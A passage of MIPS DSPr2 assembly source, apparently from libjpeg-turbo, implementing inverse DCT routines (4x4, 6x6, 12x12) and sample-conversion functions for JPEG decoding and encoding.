((JLONG)wsptr[0]) << (CONST_BITS+1) */
mflo s6, $ac0
/* MULTIPLY(wsptr[2], FIX_1_847759065) +
MULTIPLY(wsptr[6], -FIX_0_765366865) */
subu s4, s4, s5
addu t3, t2, s4 /* tmp10 = tmp0 + z2 */
mflo s7, $ac1
subu t4, t2, s4 /* tmp10 = tmp0 - z2 */
addu t7, t4, s6
subu t8, t4, s6
addu t5, t3, s7
subu t6, t3, s7
shra_r.w t5, t5, 19 /* DESCALE(tmp10 + temp2,
CONST_BITS-PASS1_BITS+1) */
shra_r.w t6, t6, 19 /* DESCALE(tmp10 - temp2,
CONST_BITS-PASS1_BITS+1) */
shra_r.w t7, t7, 19 /* DESCALE(tmp12 + temp1,
CONST_BITS-PASS1_BITS+1) */
shra_r.w t8, t8, 19 /* DESCALE(tmp12 - temp1,
CONST_BITS-PASS1_BITS+1) */
sll s4, t9, 2
lw v0, 4(a2) /* output_buf[ctr] */
shll_s.w t5, t5, 24
shll_s.w t6, t6, 24
shll_s.w t7, t7, 24
shll_s.w t8, t8, 24
sra t5, t5, 24
sra t6, t6, 24
sra t7, t7, 24
sra t8, t8, 24
addu v0, v0, a3 /* outptr = output_buf[ctr] + output_col */
addiu t5, t5, 128
addiu t6, t6, 128
addiu t7, t7, 128
addiu t8, t8, 128
sb t5, 0(v0)
sb t7, 1(v0)
sb t8, 2(v0)
sb t6, 3(v0)
/* 3 */
li s4, 15137
lw s6, 72(t1) /* wsptr[2] */
li s5, 6270
lw s7, 88(t1) /* wsptr[6] */
mul s4, s4, s6 /* MULTIPLY((JLONG)wsptr[2],
FIX_1_847759065) */
lw t2, 64(t1) /* wsptr[0] */
mul s5, s5, s7 /* MULTIPLY((JLONG)wsptr[6],
-FIX_0_765366865) */
lh t5, 92(t1) /* wsptr[7] */
lh t6, 84(t1) /* wsptr[5] */
lh t7, 76(t1) /* wsptr[3] */
lh t8, 68(t1) /* wsptr[1] */
ins t5, t6, 16, 16
ins t7, t8, 16, 16
mult $ac0, zero, zero
dpa.w.ph $ac0, t5, s0
dpa.w.ph $ac0, t7, s1
mult $ac1, zero, zero
dpa.w.ph $ac1, t5, s2
dpa.w.ph $ac1, t7, s3
sll t2, t2, 14 /* tmp0 =
((JLONG)wsptr[0]) << (CONST_BITS+1) */
mflo s6, $ac0
/* MULTIPLY(wsptr[2], FIX_1_847759065) +
MULTIPLY(wsptr[6], -FIX_0_765366865) */
subu s4, s4, s5
addu t3, t2, s4 /* tmp10 = tmp0 + z2 */
mflo s7, $ac1
subu t4, t2, s4 /* tmp10 = tmp0 - z2 */
addu t7, t4, s6
subu t8, t4, s6
addu t5, t3, s7
subu t6, t3, s7
shra_r.w t5, t5, 19 /* DESCALE(tmp10 + temp2, 19) */
shra_r.w t6, t6, 19 /* DESCALE(tmp10 - temp2, 19) */
shra_r.w t7, t7, 19 /* DESCALE(tmp12 + temp1, 19) */
shra_r.w t8, t8, 19 /* DESCALE(tmp12 - temp1, 19) */
sll s4, t9, 2
lw v0, 8(a2) /* output_buf[ctr] */
shll_s.w t5, t5, 24
shll_s.w t6, t6, 24
shll_s.w t7, t7, 24
shll_s.w t8, t8, 24
sra t5, t5, 24
sra t6, t6, 24
sra t7, t7, 24
sra t8, t8, 24
addu v0, v0, a3 /* outptr = output_buf[ctr] + output_col */
addiu t5, t5, 128
addiu t6, t6, 128
addiu t7, t7, 128
addiu t8, t8, 128
sb t5, 0(v0)
sb t7, 1(v0)
sb t8, 2(v0)
sb t6, 3(v0)
li s4, 15137
lw s6, 104(t1) /* wsptr[2] */
li s5, 6270
lw s7, 120(t1) /* wsptr[6] */
mul s4, s4, s6 /* MULTIPLY((JLONG)wsptr[2],
FIX_1_847759065) */
lw t2, 96(t1) /* wsptr[0] */
mul s5, s5, s7 /* MULTIPLY((JLONG)wsptr[6],
-FIX_0_765366865) */
lh t5, 124(t1) /* wsptr[7] */
lh t6, 116(t1) /* wsptr[5] */
lh t7, 108(t1) /* wsptr[3] */
lh t8, 100(t1) /* wsptr[1] */
ins t5, t6, 16, 16
ins t7, t8, 16, 16
mult $ac0, zero, zero
dpa.w.ph $ac0, t5, s0
dpa.w.ph $ac0, t7, s1
mult $ac1, zero, zero
dpa.w.ph $ac1, t5, s2
dpa.w.ph $ac1, t7, s3
sll t2, t2, 14 /* tmp0 =
((JLONG)wsptr[0]) << (CONST_BITS+1) */
mflo s6, $ac0
/* MULTIPLY(wsptr[2], FIX_1_847759065) +
MULTIPLY(wsptr[6], -FIX_0_765366865) */
subu s4, s4, s5
addu t3, t2, s4 /* tmp10 = tmp0 + z2; */
mflo s7, $ac1
subu t4, t2, s4 /* tmp10 = tmp0 - z2; */
addu t7, t4, s6
subu t8, t4, s6
addu t5, t3, s7
subu t6, t3, s7
shra_r.w t5, t5, 19 /* DESCALE(tmp10 + temp2, 19) */
shra_r.w t6, t6, 19 /* DESCALE(tmp10 - temp2, 19) */
shra_r.w t7, t7, 19 /* DESCALE(tmp12 + temp1, 19) */
shra_r.w t8, t8, 19 /* DESCALE(tmp12 - temp1, 19) */
sll s4, t9, 2
lw v0, 12(a2) /* output_buf[ctr] */
shll_s.w t5, t5, 24
shll_s.w t6, t6, 24
shll_s.w t7, t7, 24
shll_s.w t8, t8, 24
sra t5, t5, 24
sra t6, t6, 24
sra t7, t7, 24
sra t8, t8, 24
addu v0, v0, a3 /* outptr = output_buf[ctr] + output_col */
addiu t5, t5, 128
addiu t6, t6, 128
addiu t7, t7, 128
addiu t8, t8, 128
sb t5, 0(v0)
sb t7, 1(v0)
sb t8, 2(v0)
sb t6, 3(v0)
RESTORE_REGS_FROM_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
j ra
nop
END(jsimd_idct_4x4_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_idct_6x6_dspr2)
/*
* a0 = compptr->dct_table
* a1 = coef_block
* a2 = output_buf
* a3 = output_col
*/
.set at
SAVE_REGS_ON_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
addiu sp, sp, -144
move v0, sp
addiu v1, v0, 24
addiu t9, zero, 5793
addiu s0, zero, 10033
addiu s1, zero, 2998
1:
lh s2, 0(a0) /* q0 = quantptr[ 0] */
lh s3, 32(a0) /* q1 = quantptr[16] */
lh s4, 64(a0) /* q2 = quantptr[32] */
lh t2, 64(a1) /* tmp2 = inptr[32] */
lh t1, 32(a1) /* tmp1 = inptr[16] */
lh t0, 0(a1) /* tmp0 = inptr[ 0] */
mul t2, t2, s4 /* tmp2 = tmp2 * q2 */
mul t1, t1, s3 /* tmp1 = tmp1 * q1 */
mul t0, t0, s2 /* tmp0 = tmp0 * q0 */
lh t6, 16(a1) /* z1 = inptr[ 8] */
lh t8, 80(a1) /* z3 = inptr[40] */
lh t7, 48(a1) /* z2 = inptr[24] */
lh s2, 16(a0) /* q0 = quantptr[ 8] */
lh s4, 80(a0) /* q2 = quantptr[40] */
lh s3, 48(a0) /* q1 = quantptr[24] */
mul t2, t2, t9 /* tmp2 = tmp2 * 5793 */
mul t1, t1, s0 /* tmp1 = tmp1 * 10033 */
sll t0, t0, 13 /* tmp0 = tmp0 << 13 */
mul t6, t6, s2 /* z1 = z1 * q0 */
mul t8, t8, s4 /* z3 = z3 * q2 */
mul t7, t7, s3 /* z2 = z2 * q1 */
addu t3, t0, t2 /* tmp10 = tmp0 + tmp2 */
sll t2, t2, 1 /* tmp2 = tmp2 << 2 */
subu t4, t0, t2 /* tmp11 = tmp0 - tmp2; */
subu t5, t3, t1 /* tmp12 = tmp10 - tmp1 */
addu t3, t3, t1 /* tmp10 = tmp10 + tmp1 */
addu t1, t6, t8 /* tmp1 = z1 + z3 */
mul t1, t1, s1 /* tmp1 = tmp1 * 2998 */
shra_r.w t4, t4, 11 /* tmp11 = (tmp11 + 1024) >> 11 */
subu t2, t6, t8 /* tmp2 = z1 - z3 */
subu t2, t2, t7 /* tmp2 = tmp2 - z2 */
sll t2, t2, 2 /* tmp2 = tmp2 << 2 */
addu t0, t6, t7 /* tmp0 = z1 + z2 */
sll t0, t0, 13 /* tmp0 = tmp0 << 13 */
subu s2, t8, t7 /* q0 = z3 - z2 */
sll s2, s2, 13 /* q0 = q0 << 13 */
addu t0, t0, t1 /* tmp0 = tmp0 + tmp1 */
addu t1, s2, t1 /* tmp1 = q0 + tmp1 */
addu s2, t4, t2 /* q0 = tmp11 + tmp2 */
subu s3, t4, t2 /* q1 = tmp11 - tmp2 */
addu t6, t3, t0 /* z1 = tmp10 + tmp0 */
subu t7, t3, t0 /* z2 = tmp10 - tmp0 */
addu t4, t5, t1 /* tmp11 = tmp12 + tmp1 */
subu t5, t5, t1 /* tmp12 = tmp12 - tmp1 */
shra_r.w t6, t6, 11 /* z1 = (z1 + 1024) >> 11 */
shra_r.w t7, t7, 11 /* z2 = (z2 + 1024) >> 11 */
shra_r.w t4, t4, 11 /* tmp11 = (tmp11 + 1024) >> 11 */
shra_r.w t5, t5, 11 /* tmp12 = (tmp12 + 1024) >> 11 */
sw s2, 24(v0)
sw s3, 96(v0)
sw t6, 0(v0)
sw t7, 120(v0)
sw t4, 48(v0)
sw t5, 72(v0)
addiu v0, v0, 4
addiu a1, a1, 2
bne v0, v1, 1b
addiu a0, a0, 2
/* Pass 2: process 6 rows from work array, store into output array. */
move v0, sp
addiu v1, v0, 144
2:
lw t0, 0(v0)
lw t2, 16(v0)
lw s5, 0(a2)
addiu t0, t0, 16
sll t0, t0, 13
mul t3, t2, t9
lw t6, 4(v0)
lw t8, 20(v0)
lw t7, 12(v0)
addu s5, s5, a3
addu s6, t6, t8
mul s6, s6, s1
addu t1, t0, t3
subu t4, t0, t3
subu t4, t4, t3
lw t3, 8(v0)
mul t0, t3, s0
addu s7, t6, t7
sll s7, s7, 13
addu s7, s6, s7
subu t2, t8, t7
sll t2, t2, 13
addu t2, s6, t2
subu s6, t6, t7
subu s6, s6, t8
sll s6, s6, 13
addu t3, t1, t0
subu t5, t1, t0
addu t6, t3, s7
subu t3, t3, s7
addu t7, t4, s6
subu t4, t4, s6
addu t8, t5, t2
subu t5, t5, t2
shll_s.w t6, t6, 6
shll_s.w t3, t3, 6
shll_s.w t7, t7, 6
shll_s.w t4, t4, 6
shll_s.w t8, t8, 6
shll_s.w t5, t5, 6
sra t6, t6, 24
addiu t6, t6, 128
sra t3, t3, 24
addiu t3, t3, 128
sb t6, 0(s5)
sra t7, t7, 24
addiu t7, t7, 128
sb t3, 5(s5)
sra t4, t4, 24
addiu t4, t4, 128
sb t7, 1(s5)
sra t8, t8, 24
addiu t8, t8, 128
sb t4, 4(s5)
addiu v0, v0, 24
sra t5, t5, 24
addiu t5, t5, 128
sb t8, 2(s5)
addiu a2, a2, 4
bne v0, v1, 2b
sb t5, 3(s5)
addiu sp, sp, 144
RESTORE_REGS_FROM_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
j ra
nop
END(jsimd_idct_6x6_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_idct_12x12_pass1_dspr2)
/*
* a0 = compptr->dct_table
* a1 = coef_block
* a2 = workspace
*/
SAVE_REGS_ON_STACK 16, s0, s1, s2, s3
li a3, 8
1:
/* odd part */
lh t0, 48(a1)
lh t1, 48(a0)
lh t2, 16(a1)
lh t3, 16(a0)
lh t4, 80(a1)
lh t5, 80(a0)
lh t6, 112(a1)
lh t7, 112(a0)
mul t0, t0, t1 /* z2 */
mul t1, t2, t3 /* z1 */
mul t2, t4, t5 /* z3 */
mul t3, t6, t7 /* z4 */
li t4, 10703 /* FIX(1.306562965) */
li t5, 4433 /* FIX_0_541196100 */
li t6, 7053 /* FIX(0.860918669) */
mul t4, t0, t4 /* tmp11 */
mul t5, t0, t5 /* -tmp14 */
addu t7, t1, t2 /* tmp10 */
addu t8, t7, t3 /* tmp10 + z4 */
mul t6, t6, t8 /* tmp15 */
li t8, 2139 /* FIX(0.261052384) */
mul t8, t7, t8 /* MULTIPLY(tmp10, FIX(0.261052384)) */
li t7, 2295 /* FIX(0.280143716) */
mul t7, t1, t7 /* MULTIPLY(z1, FIX(0.280143716)) */
addu t9, t2, t3 /* z3 + z4 */
li s0, 8565 /* FIX(1.045510580) */
mul t9, t9, s0 /* -tmp13 */
li s0, 12112 /* FIX(1.478575242) */
mul s0, t2, s0 /* MULTIPLY(z3, FIX(1.478575242) */
li s1, 12998 /* FIX(1.586706681) */
mul s1, t3, s1 /* MULTIPLY(z4, FIX(1.586706681)) */
li s2, 5540 /* FIX(0.676326758) */
mul s2, t1, s2 /* MULTIPLY(z1, FIX(0.676326758)) */
li s3, 16244 /* FIX(1.982889723) */
mul s3, t3, s3 /* MULTIPLY(z4, FIX(1.982889723)) */
subu t1, t1, t3 /* z1-=z4 */
subu t0, t0, t2 /* z2-=z3 */
addu t2, t0, t1 /* z1+z2 */
li t3, 4433 /* FIX_0_541196100 */
mul t2, t2, t3 /* z3 */
li t3, 6270 /* FIX_0_765366865 */
mul t1, t1, t3 /* MULTIPLY(z1, FIX_0_765366865) */
li t3, 15137 /* FIX_0_765366865 */
mul t0, t0, t3 /* MULTIPLY(z2, FIX_1_847759065) */
addu t8, t6, t8 /* tmp12 */
addu t3, t8, t4 /* tmp12 + tmp11 */
addu t3, t3, t7 /* tmp10 */
subu t8, t8, t9 /* tmp12 + tmp13 */
addu s0, t5, s0
subu t8, t8, s0 /* tmp12 */
subu t9, t6, t9
subu s1, s1, t4
addu t9, t9, s1 /* tmp13 */
subu t6, t6, t5
subu t6, t6, s2
subu t6, t6, s3 /* tmp15 */
/* even part start */
lh t4, 64(a1)
lh t5, 64(a0)
lh t7, 32(a1)
lh s0, 32(a0)
lh s1, 0(a1)
lh s2, 0(a0)
lh s3, 96(a1)
lh v0, 96(a0)
mul t4, t4, t5 /* DEQUANTIZE(inptr[DCTSIZE*4],
quantptr[DCTSIZE*4]) */
mul t5, t7, s0 /* DEQUANTIZE(inptr[DCTSIZE*2],
quantptr[DCTSIZE*2]) */
mul t7, s1, s2 /* DEQUANTIZE(inptr[DCTSIZE*0],
quantptr[DCTSIZE*0]) */
mul s0, s3, v0 /* DEQUANTIZE(inptr[DCTSIZE*6],
quantptr[DCTSIZE*6]) */
/* odd part end */
addu t1, t2, t1 /* tmp11 */
subu t0, t2, t0 /* tmp14 */
/* update counter and pointers */
addiu a3, a3, -1
addiu a0, a0, 2
addiu a1, a1, 2
/* even part rest */
li s1, 10033
li s2, 11190
mul t4, t4, s1 /* z4 */
mul s1, t5, s2 /* z4 */
sll t5, t5, 13 /* z1 */
sll t7, t7, 13
addiu t7, t7, 1024 /* z3 */
sll s0, s0, 13 /* z2 */
addu s2, t7, t4 /* tmp10 */
subu t4, t7, t4 /* tmp11 */
subu s3, t5, s0 /* tmp12 */
addu t2, t7, s3 /* tmp21 */
subu s3, t7, s3 /* tmp24 */
addu t7, s1, s0 /* tmp12 */
addu v0, s2, t7 /* tmp20 */
subu s2, s2, t7 /* tmp25 */
subu s1, s1, t5 /* z4 - z1 */
subu s1, s1, s0 /* tmp12 */
addu s0, t4, s1 /* tmp22 */
subu t4, t4, s1 /* tmp23 */
/* final output stage */
addu t5, v0, t3
subu v0, v0, t3
addu t3, t2, t1
subu t2, t2, t1
addu t1, s0, t8
subu s0, s0, t8
addu t8, t4, t9
subu t4, t4, t9
addu t9, s3, t0
subu s3, s3, t0
addu t0, s2, t6
subu s2, s2, t6
sra t5, t5, 11
sra t3, t3, 11
sra t1, t1, 11
sra t8, t8, 11
sra t9, t9, 11
sra t0, t0, 11
sra s2, s2, 11
sra s3, s3, 11
sra t4, t4, 11
sra s0, s0, 11
sra t2, t2, 11
sra v0, v0, 11
sw t5, 0(a2)
sw t3, 32(a2)
sw t1, 64(a2)
sw t8, 96(a2)
sw t9, 128(a2)
sw t0, 160(a2)
sw s2, 192(a2)
sw s3, 224(a2)
sw t4, 256(a2)
sw s0, 288(a2)
sw t2, 320(a2)
sw v0, 352(a2)
bgtz a3, 1b
addiu a2, a2, 4
RESTORE_REGS_FROM_STACK 16, s0, s1, s2, s3
j ra
nop
END(jsimd_idct_12x12_pass1_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_idct_12x12_pass2_dspr2)
/*
* a0 = workspace
* a1 = output
*/
SAVE_REGS_ON_STACK 16, s0, s1, s2, s3
li a3, 12
1:
/* Odd part */
lw t0, 12(a0)
lw t1, 4(a0)
lw t2, 20(a0)
lw t3, 28(a0)
li t4, 10703 /* FIX(1.306562965) */
li t5, 4433 /* FIX_0_541196100 */
mul t4, t0, t4 /* tmp11 */
mul t5, t0, t5 /* -tmp14 */
addu t6, t1, t2 /* tmp10 */
li t7, 2139 /* FIX(0.261052384) */
mul t7, t6, t7 /* MULTIPLY(tmp10, FIX(0.261052384)) */
addu t6, t6, t3 /* tmp10 + z4 */
li t8, 7053 /* FIX(0.860918669) */
mul t6, t6, t8 /* tmp15 */
li t8, 2295 /* FIX(0.280143716) */
mul t8, t1, t8 /* MULTIPLY(z1, FIX(0.280143716)) */
addu t9, t2, t3 /* z3 + z4 */
li s0, 8565 /* FIX(1.045510580) */
mul t9, t9, s0 /* -tmp13 */
li s0, 12112 /* FIX(1.478575242) */
mul s0, t2, s0 /* MULTIPLY(z3, FIX(1.478575242)) */
li s1, 12998 /* FIX(1.586706681) */
mul s1, t3, s1 /* MULTIPLY(z4, FIX(1.586706681)) */
li s2, 5540 /* FIX(0.676326758) */
mul s2, t1, s2 /* MULTIPLY(z1, FIX(0.676326758)) */
li s3, 16244 /* FIX(1.982889723) */
mul s3, t3, s3 /* MULTIPLY(z4, FIX(1.982889723)) */
subu t1, t1, t3 /* z1 -= z4 */
subu t0, t0, t2 /* z2 -= z3 */
addu t2, t1, t0 /* z1 + z2 */
li t3, 4433 /* FIX_0_541196100 */
mul t2, t2, t3 /* z3 */
li t3, 6270 /* FIX_0_765366865 */
mul t1, t1, t3 /* MULTIPLY(z1, FIX_0_765366865) */
li t3, 15137 /* FIX_1_847759065 */
mul t0, t0, t3 /* MULTIPLY(z2, FIX_1_847759065) */
addu t3, t6, t7 /* tmp12 */
addu t7, t3, t4
addu t7, t7, t8 /* tmp10 */
subu t3, t3, t9
subu t3, t3, t5
subu t3, t3, s0 /* tmp12 */
subu t9, t6, t9
subu t9, t9, t4
addu t9, t9, s1 /* tmp13 */
subu t6, t6, t5
subu t6, t6, s2
subu t6, t6, s3 /* tmp15 */
addu t1, t2, t1 /* tmp11 */
subu t0, t2, t0 /* tmp14 */
/* even part */
lw t2, 16(a0) /* z4 */
lw t4, 8(a0) /* z1 */
lw t5, 0(a0) /* z3 */
lw t8, 24(a0) /* z2 */
li s0, 10033 /* FIX(1.224744871) */
li s1, 11190 /* FIX(1.366025404) */
mul t2, t2, s0 /* z4 */
mul s0, t4, s1 /* z4 */
addiu t5, t5, 0x10
sll t5, t5, 13 /* z3 */
sll t4, t4, 13 /* z1 */
sll t8, t8, 13 /* z2 */
subu s1, t4, t8 /* tmp12 */
addu s2, t5, t2 /* tmp10 */
subu t2, t5, t2 /* tmp11 */
addu s3, t5, s1 /* tmp21 */
subu s1, t5, s1 /* tmp24 */
addu t5, s0, t8 /* tmp12 */
addu v0, s2, t5 /* tmp20 */
subu t5, s2, t5 /* tmp25 */
subu t4, s0, t4
subu t4, t4, t8 /* tmp12 */
addu t8, t2, t4 /* tmp22 */
subu t2, t2, t4 /* tmp23 */
/* increment counter and pointers */
addiu a3, a3, -1
addiu a0, a0, 32
/* Final stage */
addu t4, v0, t7
subu v0, v0, t7
addu t7, s3, t1
subu s3, s3, t1
addu t1, t8, t3
subu t8, t8, t3
addu t3, t2, t9
subu t2, t2, t9
addu t9, s1, t0
subu s1, s1, t0
addu t0, t5, t6
subu t5, t5, t6
sll t4, t4, 4
sll t7, t7, 4
sll t1, t1, 4
sll t3, t3, 4
sll t9, t9, 4
sll t0, t0, 4
sll t5, t5, 4
sll s1, s1, 4
sll t2, t2, 4
sll t8, t8, 4
sll s3, s3, 4
sll v0, v0, 4
shll_s.w t4, t4, 2
shll_s.w t7, t7, 2
shll_s.w t1, t1, 2
shll_s.w t3, t3, 2
shll_s.w t9, t9, 2
shll_s.w t0, t0, 2
shll_s.w t5, t5, 2
shll_s.w s1, s1, 2
shll_s.w t2, t2, 2
shll_s.w t8, t8, 2
shll_s.w s3, s3, 2
shll_s.w v0, v0, 2
srl t4, t4, 24
srl t7, t7, 24
srl t1, t1, 24
srl t3, t3, 24
srl t9, t9, 24
srl t0, t0, 24
srl t5, t5, 24
srl s1, s1, 24
srl t2, t2, 24
srl t8, t8, 24
srl s3, s3, 24
srl v0, v0, 24
lw t6, 0(a1)
addiu t4, t4, 0x80
addiu t7, t7, 0x80
addiu t1, t1, 0x80
addiu t3, t3, 0x80
addiu t9, t9, 0x80
addiu t0, t0, 0x80
addiu t5, t5, 0x80
addiu s1, s1, 0x80
addiu t2, t2, 0x80
addiu t8, t8, 0x80
addiu s3, s3, 0x80
addiu v0, v0, 0x80
sb t4, 0(t6)
sb t7, 1(t6)
sb t1, 2(t6)
sb t3, 3(t6)
sb t9, 4(t6)
sb t0, 5(t6)
sb t5, 6(t6)
sb s1, 7(t6)
sb t2, 8(t6)
sb t8, 9(t6)
sb s3, 10(t6)
sb v0, 11(t6)
bgtz a3, 1b
addiu a1, a1, 4
RESTORE_REGS_FROM_STACK 16, s0, s1, s2, s3
jr ra
nop
END(jsimd_idct_12x12_pass2_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_convsamp_dspr2)
/*
* a0 = sample_data
* a1 = start_col
* a2 = workspace
*/
lw t0, 0(a0)
li t7, 0xff80ff80
addu t0, t0, a1
ulw t1, 0(t0)
ulw t2, 4(t0)
preceu.ph.qbr t3, t1
preceu.ph.qbl t4, t1
lw t0, 4(a0)
preceu.ph.qbr t5, t2
preceu.ph.qbl t6, t2
addu t0, t0, a1
addu.ph t3, t3, t7
addu.ph t4, t4, t7
ulw t1, 0(t0)
ulw t2, 4(t0)
addu.ph t5, t5, t7
addu.ph t6, t6, t7
usw t3, 0(a2)
usw t4, 4(a2)
preceu.ph.qbr t3, t1
preceu.ph.qbl t4, t1
usw t5, 8(a2)
usw t6, 12(a2)
lw t0, 8(a0)
preceu.ph.qbr t5, t2
preceu.ph.qbl t6, t2
addu t0, t0, a1
addu.ph t3, t3, t7
addu.ph t4, t4, t7
ulw t1, 0(t0)
ulw t2, 4(t0)
addu.ph t5, t5, t7
addu.ph t6, t6, t7
usw t3, 16(a2)
usw t4, 20(a2)
preceu.ph.qbr t3, t1
preceu.ph.qbl t4, t1
usw t5, 24(a2)
usw t6, 28(a2)
lw t0, 12(a0)
preceu.ph.qbr t5, t2
preceu.ph.qbl t6, t2
addu t0, t0, a1
addu.ph t3, t3, t7
addu.ph t4, t4, t7
ulw t1, 0(t0)
ulw t2, 4(t0)
addu.ph t5, t5, t7
addu.ph t6, t6, t7
usw t3, 32(a2)
usw t4, 36(a2)
preceu.ph.qbr t3, t1
preceu.ph.qbl t4, t1
usw t5, 40(a2)
usw t6, 44(a2)
lw t0, 16(a0)
preceu.ph.qbr t5, t2
preceu.ph.qbl t6, t2
addu t0, t0, a1
addu.ph t3, t3, t7
addu.ph t4, t4, t7
ulw t1, 0(t0)
ulw t2, 4(t0)
addu.ph t5, t5, t7
addu.ph t6, t6, t7
usw t3, 48(a2)
usw t4, 52(a2)
preceu.ph.qbr t3, t1
preceu.ph.qbl t4, t1
usw t5, 56(a2)
usw t6, 60(a2)
lw t0, 20(a0)
preceu.ph.qbr t5, t2
preceu.ph.qbl t6, t2
addu t0, t0, a1
addu.ph t3, t3, t7
addu.ph t4, t4, t7
ulw t1, 0(t0)
ulw t2, 4(t0)
addu.ph t5, t5, t7
addu.ph t6, t6, t7
usw t3, 64(a2)
usw t4, 68(a2)
preceu.ph.qbr t3, t1
preceu.ph.qbl t4, t1
usw t5, 72(a2)
usw t6, 76(a2)
lw t0, 24(a0)
preceu.ph.qbr t5, t2
preceu.ph.qbl t6, t2
addu t0, t0, a1
addu.ph t3, t3, t7
addu.ph t4, t4, t7
ulw t1, 0(t0)
ulw t2, 4(t0)
addu.ph t5, t5, t7
addu.ph t6, t6, t7
usw t3, 80(a2)
usw t4, 84(a2)
preceu.ph.qbr t3, t1
preceu.ph.qbl t4, t1
usw t5, 88(a2)
usw t6, 92(a2)
lw t0, 28(a0)
preceu.ph.qbr t5, t2
preceu.ph.qbl t6, t2
addu t0, t0, a1
addu.ph t3, t3, t7
addu.ph t4, t4, t7
ulw t1, 0(t0)
ulw t2, 4(t0)
addu.ph t5, t5, t7
addu.ph t6, t6, t7
usw t3, 96(a2)
usw t4, 100(a2)
preceu.ph.qbr t3, t1
preceu.ph.qbl t4, t1
usw t5, 104(a2)
usw t6, 108(a2)
preceu.ph.qbr t5, t2
preceu.ph.qbl t6, t2
addu.ph t3, t3, t7
addu.ph t4, t4, t7
addu.ph t5, t5, t7
addu.ph t6, t6, t7
usw t3, 112(a2)
usw t4, 116(a2)
usw t5, 120(a2)
usw t6, 124(a2)
j ra
nop
END(jsimd_convsamp_dspr2)
#ifndef __mips_soft_float
/*****************************************************************************/
LEAF_DSPR2(jsimd_convsamp_float_dspr2)
/*
* a0 = sample_data
* a1 = start_col
* a2 = workspace
*/
.set at
lw t0, 0(a0)
addu t0, t0, a1
lbu t1, 0(t0)
lbu t2, 1(t0)
lbu t3, 2(t0)
lbu t4, 3(t0)
lbu t5, 4(t0)
lbu t6, 5(t0)
lbu t7, 6(t0)
lbu t8, 7(t0)
addiu t1, t1, -128
addiu t2, t2, -128
addiu t3, t3, -128
addiu t4, t4, -128
addiu t5, t5, -128
addiu t6, t6, -128
addiu t7, t7, -128
addiu t8, t8, -128
mtc1 t1, f2
mtc1 t2, f4
mtc1 t3, f6
mtc1 t4, f8
mtc1 t5, f10
mtc1 t6, f12
mtc1 t7, f14
mtc1 t8, f16
cvt.s.w f2, f2
cvt.s.w f4, f4
cvt.s.w f6, f6
cvt.s.w f8, f8
cvt.s.w f10, f10
cvt.s.w f12, f12
cvt.s.w f14, f14
cvt.s.w f16, f16
lw t0, 4(a0)
swc1 f2, 0(a2)
swc1 f4, 4(a2)
swc1 f6, 8(a2)
addu t0, t0, a1
swc1 f8, 12(a2)
swc1 f10, 16(a2)
swc1 f12, 20(a2)
swc1 f14, 24(a2)
swc1 f16, 28(a2)
/* elemr 1 */
lbu t1, 0(t0)
lbu t2, 1(t0)
lbu t3, 2(t0)
lbu t4, 3(t0)
lbu t5, 4(t0)
lbu t6, 5(t0)
lbu t7, 6(t0)
lbu t8, 7(t0)
addiu t1, t1, -128
addiu t2, t2, -128
addiu t3, t3, -128
addiu t4, t4, -128
addiu t5, t5, -128
addiu t6, t6, -128
addiu t7, t7, -128
addiu t8, t8, -128
mtc1 t1, f2
mtc1 t2, f4
mtc1 t3, f6
mtc1 t4, f8
mtc1 t5, f10
mtc1 t6, f12
mtc1 t7, f14
mtc1 t8, f16
cvt.s.w f2, f2
cvt.s.w f4, f4
cvt.s.w f6, f6
cvt.s.w f8, f8
cvt.s.w f10, f10
cvt.s.w f12, f12
cvt.s.w f14, f14
cvt.s.w f16, f16
lw t0, 8(a0)
swc1 f2, 32(a2)
swc1 f4, 36(a2)
swc1 f6, 40(a2)
addu t0, t0, a1
swc1 f8, 44(a2)
swc1 f10, 48(a2)
swc1 f12, 52(a2)
swc1 f14, 56(a2)
swc1 f16, 60(a2)
/* elemr 2 */
lbu t1, 0(t0)
lbu t2, 1(t0)
lbu t3, 2(t0)
lbu t4, 3(t0)
lbu t5, 4(t0)
lbu t6, 5(t0)
lbu t7, 6(t0)
lbu t8, 7(t0)
addiu t1, t1, -128
addiu t2, t2, -128
addiu t3, t3, -128
addiu t4, t4, -128
addiu t5, t5, -128
addiu t6, t6, -128
addiu t7, t7, -128
addiu t8, t8, -128
mtc1 t1, f2
mtc1 t2, f4
mtc1 t3, f6
mtc1 t4, f8
mtc1 t5, f10
mtc1 t6, f12
mtc1 t7, f14
mtc1 t8, f16
cvt.s.w f2, f2
cvt.s.w f4, f4
cvt.s.w f6, f6
cvt.s.w f8, f8
cvt.s.w f10, f10
cvt.s.w f12, f12
cvt.s.w f14, f14
cvt.s.w f16, f16
lw t0, 12(a0)
swc1 f2, 64(a2)
swc1 f4, 68(a2)
swc1 f6, 72(a2)
addu t0, t0, a1
swc1 f8, 76(a2)
swc1 f10, 80(a2)
swc1 f12, 84(a2)
swc1 f14, 88(a2)
swc1 f16, 92(a2)
/* elemr 3 */
lbu t1, 0(t0)
lbu t2, 1(t0)
lbu t3, 2(t0)
lbu t4, 3(t0)
lbu t5, 4(t0)
lbu t6, 5(t0)
lbu t7, 6(t0)
lbu t8, 7(t0)
addiu t1, t1, -128
addiu t2, t2, -128
addiu t3, t3, -128
addiu t4, t4, -128
addiu t5, t5, -128
addiu t6, t6, -128
addiu t7, t7, -128
addiu t8, t8, -128
mtc1 t1, f2
mtc1 t2, f4
mtc1 t3, f6
mtc1 t4, f8
mtc1 t5, f10
mtc1 t6, f12
mtc1 t7, f14
mtc1 t8, f16
cvt.s.w f2, f2
cvt.s.w f4, f4
cvt.s.w f6, f6
cvt.s.w f8, f8
cvt.s.w f10, f10
cvt.s.w f12, f12
cvt.s.w f14, f14
cvt.s.w f16, f16
lw t0, 16(a0)
swc1 f2, 96(a2)
swc1 f4, 100(a2)
swc1 f6, 104(a2)
addu t0, t0, a1
swc1 f8, 108(a2)
swc1 f10, 112(a2)
swc1 f12, 116(a2)
swc1 f14, 120(a2)
swc1 f16, 124(a2)
/* elemr 4 */
lbu t1, 0(t0)
lbu t2, 1(t0)
lbu t3, 2(t0)
lbu t4, 3(t0)
lbu t5, 4(t0)
lbu t6, 5(t0)
